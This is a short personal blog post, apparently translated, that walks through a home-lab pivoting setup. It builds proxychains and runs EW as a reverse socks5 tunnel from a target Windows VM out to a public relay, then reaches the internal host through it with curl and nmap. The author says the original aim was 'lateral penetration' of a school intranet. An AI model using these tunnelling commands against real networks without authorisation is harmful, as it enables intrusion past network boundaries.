Today I wanted to carry out lateral penetration into the school's intranet server for the first time in my life, but the situation did not allow it, but at least I learned something and I have to write it down and save it.
tool:
EW: https://github.com/idlefire/ew
proxychains: https://github.com/rofl0r/proxychains-ng
Xiaomi portable wifi: http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe
phpstudy: https://m.xp.cn/
machine:
Target machine ip: 192.168.31.20
kali ip:192.168.1.128
Since I couldn't use the school's intranet server, and I only had a laptop and a few virtual machines, and I happened to have a Xiaomi portable wifi, I thought about separating the laptop and the virtual machine into two intranet environments, so as to use The test environment is more realistic (in fact, it makes me feel happier). At the same time, for some unknown reason, the virtual machine cannot connect to the mobile hotspot. In order to experiment faster, I connected the local wifi to my own hotspot, and the virtual machine connected to the current one. router.
The first step, win7 virtual machine configuration and preparation
Download the Xiaomi portable wifi installation package, install the win7 virtual machine, and plug the Xiaomi portable wifi into the laptop. There will be an extra wifi connection at the network connection, and then connect to the router wifi. At the same time, the machine connects to the mobile hotspot to ensure that the two are not in the same intranet environment. (If there is no external network card here, you can ignore it)
Then open phpstudy to judge whether the proxy is successful.
The second step, kali virtual machine configuration
Configure proxychain
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-configAfter the installation is successful, modify its configuration to your public network ip and port
vi /etc/proxychains.conf
Change to
Step 3, EW reverse socks5 proxy
Service-Terminal
chmod +x ew_for_linux64
./ew_for_linux64 -s rcsocks -l 1080 -e 1024Kali connects to port 1080, which corresponds to the port in the proxychains configuration. Then the target machine connects to port 1024, and the server sends the request for port 1080 to port 1024 to the target machine.
Target machine
ew_for_Win.exe -s rssocks -d 公网ip -e 1024Note that the code is rssocks, not rcsocks on the server side. The first test failed because of this, and I checked it for a long time o(╥﹏╥)o
Successful connection as shown in the figure
Service-Terminal
After that, kali accesses the target machine through proxychains
proxychains4 curl 192.168.31.20
It can be seen that kali has been able to access the target machine through the proxy, so far, the test has been successfully completed.
After that you can happily carry out lateral penetration.
nmap scan
But if you directly set up a proxy on the local machine to access, it will report an error that socks4 does not support
I found the win proxy proxifier and set up Google Chrome in it to use this software proxy to access the intranet website. However, it always fails when using goby proxy.
[11.20 16:35:36] Goby.exe *64 - gobygo.net:443 ERROR: Failed to connect via proxy xxxx:1080 - The proxy closed the connection unexpectedly.
Sometimes there is data transfer, but most of the time it fails
Bow to the boss!
http://blog.leanote.com/post/snowming/ffa952c0096d